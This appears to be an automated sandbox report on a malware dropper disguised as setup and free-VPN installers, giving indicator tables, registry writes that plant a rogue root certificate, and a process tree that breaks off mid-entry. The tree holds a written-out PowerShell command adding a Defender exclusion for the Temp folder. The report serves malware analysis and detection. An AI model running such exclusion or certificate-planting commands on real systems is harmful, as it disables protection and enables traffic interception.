Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0ADEF1D7458FF50D2CB80F9B486455321D405097	search_awesome.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0ADEF1D7458FF50D2CB80F9B486455321D405097\Blob = 0300000001000000140000000adef1d7458ff50d2cb80f9b486455321d4050972000000001000000e8050000308205e4308203cca003020102020900befe70a4dda2b7cb300d06092a864886f70d01010b0500307f310b30090603550406130247423110300e06035504080c07456e676c616e6431143012060355040a0c0b4c657474756365204c7464312a3028060355040b0c214c657474756365204c746420436572746966696361746520417574686f72697479311c301a06035504030c134c657474756365204c746420526f6f74204341301e170d3138303831333132303033375a170d3338303830383132303033375a307f310b30090603550406130247423110300e06035504080c07456e676c616e6431143012060355040a0c0b4c657474756365204c7464312a3028060355040b0c214c657474756365204c746420436572746966696361746520417574686f72697479311c301a06035504030c134c657474756365204c746420526f6f7420434130820222300d06092a864886f70d01010105000382020f003082020a0282020100ec84dbe1167402d093ee3957327a06f9ec78467185f3758cc42ff40a107901077b927de82e728413da614f1c7f167b842fd796ae20c966e18c3dd3725847531abfe6409a014278e8896fd18294f5e03dec7ae50b78e7ec4dc846f5157cfada8ef851306caf45a27d87c24ad54daa5ca764410a264558c05eb60e434e3174d28da2e8e56623f0920570047c3b57cf4ff981de8ba8062c3ab7334212ad00ac02768d933d0529b1d0607095bfbac20035cc0ae05b09dd87859a8387c18124e518d7161120016425658cd22ba129f5a9f4e09428be41bbc647c9456fe0a2b69ebcf0454b0c0f6fd3a46de9bdfbc74600fcf99a66a58d8a5c20a38272787f91a85d00d150880084cb2dada7701cc49aa4d64e007f6e9f3195a853fdf4a1d179f7d27e51a2dcaac65c4d017c645cd398da383f2a71656f192a314a3937551e33a10254727091235b967f0f596507f9ecc2d43247ac3a012e4125cb12a50a4c7bdc522d18cd0220125c8b30855f977f525a4a7ca16d9baad08e0c45b3fb57a290b2c2fafebe4953b1c8cc054cf196b5f64401b6eb5b1373a965e44cf1d438d307c05993bd41360c04e9537ab5b3780907a35dca4c2366935b49df8e25e8c1796e3150c584789b5c6143c4a51360930509ea83c4f881de1ec129d848d8eba5a081a29fca85b5a4aebeaa4909fa516ca50b2e1598231dbddfed4cab68348c4da0f23f29610203010001a3633061301d0603551d0e04160414379af2941ff3e0417c6af2e31e855e6bf9f82273301f0603551d23041830168014379af2941ff3e0417c6af2e31e855e6bf9f82273300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010007b451d6a5447265e025dbc28a15be06be84d8e583fcce5c4fb244004c1eb101c3e93877ece6ee7979ff9315158787f56252e0f54af375c9a4632a5bcd13eddffe7a1268a60e3b92c6cc39d67e6feb897740e11621ba1402ebccae7b2523ffe666ce2c9f9a2144078ceb615baa6053d0b829bd593bb67b250771c7977a8d2762a14449f446b8477f45f2737ee61d8d409d91efa918a066808c19f61f4e697656eb65ff36729dc647d8bd16b7b37cafa52d2093ea1eef1461ffba97f854253611d96ca818c1b1114e2fb9484f14c302eb70956fb31e55b67b7680862f681dd68b41d5edbced86a424a9c11c5633e102a709e8f5d78d23cd0678e49f64c768f615ff3460271b16b4b9b5c1251e1618145699bd6a44a483bf9e0fbbeda73122e60cc8a40a1cc798f6b893613c25f5dffd1aa5d445ed3c9f6fa9d7696c4ac808d045b46b986bd9afc56227230a099f90d7d1c1de04326aa205c297d5db27b58fd6e7f5a3611c46297786cc295a25f1bce53ed1e2ee78247b14f4621a12c119f89be4dc2411c0c118e90d18d0f433d862e2a8d6b3d8735c2e1001f056eb0e19790bcabbe301a9fa129e4718ad041479116770c4a760087f21cd9ddfd0f01b3b012fce9c0150a926fcf7d11954adab6e40186cf951411da04407ca39c7d120246319fd4053d9f53c01b1363101127beb63fb811fe1691da6851dd5aec644b7dd88b2b5	search_awesome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TempState\Downloads\freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe.a1kypgf.partial:Zone.Identifier	browser_broker.exe

Script User-Agent 3 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	56	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	63	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	118	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
420	powershell.exe
420	powershell.exe
420	powershell.exe
420	powershell.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
4276	WerFault.exe
3152	Fri15af75ee9b.exe
3152	Fri15af75ee9b.exe
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
4988	WerFault.exe
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3008	Process not Found

Suspicious behavior: MapViewOfSection 26 IoCs

pid	Process
3152	Fri15af75ee9b.exe
4660	ejsdgsb
6708	MicrosoftEdgeCP.exe
6708	MicrosoftEdgeCP.exe
6708	MicrosoftEdgeCP.exe
6708	MicrosoftEdgeCP.exe
6708	MicrosoftEdgeCP.exe
6708	MicrosoftEdgeCP.exe
5788	ejsdgsb
6708	MicrosoftEdgeCP.exe
6708	MicrosoftEdgeCP.exe
3548	MicrosoftEdgeCP.exe
3548	MicrosoftEdgeCP.exe
5676	ejsdgsb
3336	MicrosoftEdgeCP.exe
3336	MicrosoftEdgeCP.exe
6684	MicrosoftEdgeCP.exe
6684	MicrosoftEdgeCP.exe
6280	ejsdgsb
6684	MicrosoftEdgeCP.exe
6684	MicrosoftEdgeCP.exe
6292	MicrosoftEdgeCP.exe
6292	MicrosoftEdgeCP.exe
4092	MicrosoftEdgeCP.exe
4092	MicrosoftEdgeCP.exe
1376	ejsdgsb

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
4140	6677246.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	192	Fri1553f0ee90.exe
Token: SeDebugPrivilege	2664	Fri155442fc38b.exe
Token: SeDebugPrivilege	420	powershell.exe
Token: SeDebugPrivilege	4404	2.exe
Token: SeDebugPrivilege	4324	7181836.exe
Token: SeDebugPrivilege	4316	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	4100	BearVpn 3.exe
Token: SeDebugPrivilege	4276	WerFault.exe
Token: SeDebugPrivilege	4188	8560908.exe
Token: SeDebugPrivilege	4240	8037787.exe
Token: SeRestorePrivilege	4988	WerFault.exe
Token: SeBackupPrivilege	4988	WerFault.exe
Token: SeBackupPrivilege	4988	WerFault.exe
Token: SeDebugPrivilege	4444	zab2our.exe
Token: SeDebugPrivilege	4988	WerFault.exe
Token: SeDebugPrivilege	5148	WerFault.exe
Token: SeDebugPrivilege	5256	WerFault.exe
Token: SeDebugPrivilege	2984	7358051.exe
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeDebugPrivilege	5480	WerFault.exe
Token: SeDebugPrivilege	5504	WerFault.exe
Token: SeDebugPrivilege	4528	6684504.exe
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeDebugPrivilege	5808	WerFault.exe
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeDebugPrivilege	5840	WerFault.exe
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found
Token: SeCreatePagefilePrivilege	3008	Process not Found
Token: SeShutdownPrivilege	3008	Process not Found

Suspicious use of FindShellTrayWindow 8 IoCs

pid	Process
4884	setup_2.tmp
5716	ultramediaburner.tmp
6988	installer.exe
3008	Process not Found
3008	Process not Found
2036	FreeVPN.exe
3008	Process not Found
3008	Process not Found

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
2036	FreeVPN.exe
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found
3008	Process not Found

Suspicious use of SetWindowsHookEx 34 IoCs

pid	Process
3008	Process not Found
6680	MicrosoftEdge.exe
7120	cmd.exe
5396	MicrosoftEdgeCP.exe
5396	MicrosoftEdgeCP.exe
4188	MicrosoftEdge.exe
6708	MicrosoftEdgeCP.exe
6708	MicrosoftEdgeCP.exe
4684	freevpn_setup_e_wp001g0hp4cqsk9aiin98pce.exe
4176	search_awesome.exe
6952	setup.exe
3636	setup.exe
1048	setup.exe
4068	FreeVPN.exe
4076	FreeVPN.exe
2036	FreeVPN.exe
2036	FreeVPN.exe
2036	FreeVPN.exe
4068	MicrosoftEdge.exe
3548	MicrosoftEdgeCP.exe
3548	MicrosoftEdgeCP.exe
4116	MicrosoftEdge.exe
3336	MicrosoftEdgeCP.exe
3336	MicrosoftEdgeCP.exe
6084	MicrosoftEdge.exe
6684	MicrosoftEdgeCP.exe
6684	MicrosoftEdgeCP.exe
5176	MicrosoftEdge.exe
6292	MicrosoftEdgeCP.exe
6292	MicrosoftEdgeCP.exe
3208	MicrosoftEdge.exe
4092	MicrosoftEdgeCP.exe
4092	MicrosoftEdgeCP.exe
4132	MicrosoftEdge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 436 wrote to memory of 2740	436	setup_x86_x64_install.exe	76
PID 436 wrote to memory of 2740	436	setup_x86_x64_install.exe	76
PID 436 wrote to memory of 2740	436	setup_x86_x64_install.exe	76
PID 2740 wrote to memory of 3904	2740	setup_installer.exe	77
PID 2740 wrote to memory of 3904	2740	setup_installer.exe	77
PID 2740 wrote to memory of 3904	2740	setup_installer.exe	77
PID 3904 wrote to memory of 3852	3904	setup_install.exe	80
PID 3904 wrote to memory of 3852	3904	setup_install.exe	80
PID 3904 wrote to memory of 3852	3904	setup_install.exe	80
PID 3904 wrote to memory of 1544	3904	setup_install.exe	81
PID 3904 wrote to memory of 1544	3904	setup_install.exe	81
PID 3904 wrote to memory of 1544	3904	setup_install.exe	81
PID 3904 wrote to memory of 1324	3904	setup_install.exe	82
PID 3904 wrote to memory of 1324	3904	setup_install.exe	82
PID 3904 wrote to memory of 1324	3904	setup_install.exe	82
PID 3904 wrote to memory of 2120	3904	setup_install.exe	83
PID 3904 wrote to memory of 2120	3904	setup_install.exe	83
PID 3904 wrote to memory of 2120	3904	setup_install.exe	83
PID 3904 wrote to memory of 2060	3904	setup_install.exe	84
PID 3904 wrote to memory of 2060	3904	setup_install.exe	84
PID 3904 wrote to memory of 2060	3904	setup_install.exe	84
PID 3904 wrote to memory of 596	3904	setup_install.exe	93
PID 3904 wrote to memory of 596	3904	setup_install.exe	93
PID 3904 wrote to memory of 596	3904	setup_install.exe	93
PID 1324 wrote to memory of 3892	1324	cmd.exe	92
PID 1324 wrote to memory of 3892	1324	cmd.exe	92
PID 1324 wrote to memory of 3892	1324	cmd.exe	92
PID 3904 wrote to memory of 2848	3904	setup_install.exe	91
PID 3904 wrote to memory of 2848	3904	setup_install.exe	91
PID 3904 wrote to memory of 2848	3904	setup_install.exe	91
PID 3852 wrote to memory of 420	3852	cmd.exe	90
PID 3852 wrote to memory of 420	3852	cmd.exe	90
PID 3852 wrote to memory of 420	3852	cmd.exe	90
PID 1544 wrote to memory of 1624	1544	cmd.exe	89
PID 1544 wrote to memory of 1624	1544	cmd.exe	89
PID 1544 wrote to memory of 1624	1544	cmd.exe	89
PID 3904 wrote to memory of 1652	3904	setup_install.exe	85
PID 3904 wrote to memory of 1652	3904	setup_install.exe	85
PID 3904 wrote to memory of 1652	3904	setup_install.exe	85
PID 2120 wrote to memory of 2968	2120	cmd.exe	87
PID 2120 wrote to memory of 2968	2120	cmd.exe	87
PID 2120 wrote to memory of 2968	2120	cmd.exe	87
PID 1652 wrote to memory of 192	1652	cmd.exe	86
PID 1652 wrote to memory of 192	1652	cmd.exe	86
PID 2060 wrote to memory of 2664	2060	cmd.exe	88
PID 2060 wrote to memory of 2664	2060	cmd.exe	88
PID 596 wrote to memory of 3152	596	cmd.exe	94
PID 596 wrote to memory of 3152	596	cmd.exe	94
PID 596 wrote to memory of 3152	596	cmd.exe	94
PID 2968 wrote to memory of 1104	2968	Fri157e25afd971.exe	95
PID 2968 wrote to memory of 1104	2968	Fri157e25afd971.exe	95
PID 2968 wrote to memory of 1104	2968	Fri157e25afd971.exe	95
PID 192 wrote to memory of 4140	192	Fri1553f0ee90.exe	121
PID 192 wrote to memory of 4140	192	Fri1553f0ee90.exe	121
PID 192 wrote to memory of 4140	192	Fri1553f0ee90.exe	121
PID 4140 wrote to memory of 4260	4140	6677246.exe	165
PID 4140 wrote to memory of 4260	4140	6677246.exe	165
PID 4140 wrote to memory of 4316	4140	6677246.exe	98
PID 4140 wrote to memory of 4316	4140	6677246.exe	98
PID 2664 wrote to memory of 4324	2664	Fri155442fc38b.exe	99
PID 2664 wrote to memory of 4324	2664	Fri155442fc38b.exe	99
PID 4140 wrote to memory of 4404	4140	6677246.exe	107
PID 4140 wrote to memory of 4404	4140	6677246.exe	107
PID 2664 wrote to memory of 4428	2664	Fri155442fc38b.exe	100

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1056
- C:\Users\Admin\AppData\Roaming\ejsdgsb
  C:\Users\Admin\AppData\Roaming\ejsdgsb
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4660
- C:\Users\Admin\AppData\Roaming\ejsdgsb
  C:\Users\Admin\AppData\Roaming\ejsdgsb
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5788
- C:\Users\Admin\AppData\Roaming\ejsdgsb
  C:\Users\Admin\AppData\Roaming\ejsdgsb
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:5676
- C:\Users\Admin\AppData\Roaming\ejsdgsb
  C:\Users\Admin\AppData\Roaming\ejsdgsb
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:6280
- C:\Users\Admin\AppData\Roaming\ejsdgsb
  C:\Users\Admin\AppData\Roaming\ejsdgsb
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:1376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2608

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2716

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2708

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2432

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1836

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1408

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1392

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1204

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1136

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:372

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:436
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Users\Admin\AppData\Local\Temp\7zS4BA1BD74\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS4BA1BD74\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:3904
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3852
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:420
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1544861ac3fe6a.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1544
    - - C:\Users\Admin\AppData\Local\Temp\7zS4BA1BD74\Fri1544861ac3fe6a.exe
        
        Fri1544861ac3fe6a.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1624
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 772
        6⤵
        Drops file in Windows directory
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4988
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 796
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:5256
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 816
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:5480
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 828
        6⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:5808
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 960
        6⤵
        Program crash
        
        PID:6088
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 988
        6⤵
        Program crash
        
        PID:5456
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1052
        6⤵
        Program crash
        
        PID:5552
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1384
        6⤵
        Program crash
        
        PID:5844
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1356
        6⤵
        Program crash
        
        PID:424
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1452
        6⤵
        Program crash
        
        PID:6664
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1684
        6⤵
        Program crash
        
        PID:7020
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1556
        6⤵
        Program crash
        
        PID:6240
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1588
        6⤵
        Program crash
        
        PID:6756
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1632
        6⤵
        Program crash
        
        PID:6948
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1724
        6⤵
        Program crash
        
        PID:6380
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1624 -s 1668
        6⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:6436
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri156ec98815f89c.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1324
    - - C:\Users\Admin\AppData\Local\Temp\7zS4BA1BD74\Fri156ec98815f89c.exe
        
        Fri156ec98815f89c.exe
        5⤵
        Executes dropped EXE
        
        PID:3892
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri157e25afd971.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2120
    - - C:\Users\Admin\AppData\Local\Temp\7zS4BA1BD74\Fri157e25afd971.exe
        
        Fri157e25afd971.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2968
      - C:\Users\Admin\AppData\Local\Temp\is-M4CT0.tmp\Fri157e25afd971.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-M4CT0.tmp\Fri157e25afd971.tmp" /SL5="$601D2,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS4BA1BD74\Fri157e25afd971.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1104
        
        C:\Users\Admin\AppData\Local\Temp\is-A1JI8.tmp\zab2our.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-A1JI8.tmp\zab2our.exe" /S /UID=burnerch2
        7⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:4444
        
        C:\Program Files\Windows Sidebar\LVBVEXDWEG\ultramediaburner.exe
        
        "C:\Program Files\Windows Sidebar\LVBVEXDWEG\ultramediaburner.exe" /VERYSILENT
        8⤵
        Executes dropped EXE
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\Temp\is-IVGOU.tmp\ultramediaburner.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-IVGOU.tmp\ultramediaburner.tmp" /SL5="$102C4,281924,62464,C:\Program Files\Windows Sidebar\LVBVEXDWEG\ultramediaburner.exe" /VERYSILENT
        9⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:5716
        
        C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
        
        "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
        10⤵
        Executes dropped EXE
        
        PID:6024
        
        C:\Users\Admin\AppData\Local\Temp\bf-e495b-64b-f8db1-2705a8cbfa4ed\Sygaluvuzhe.exe
        
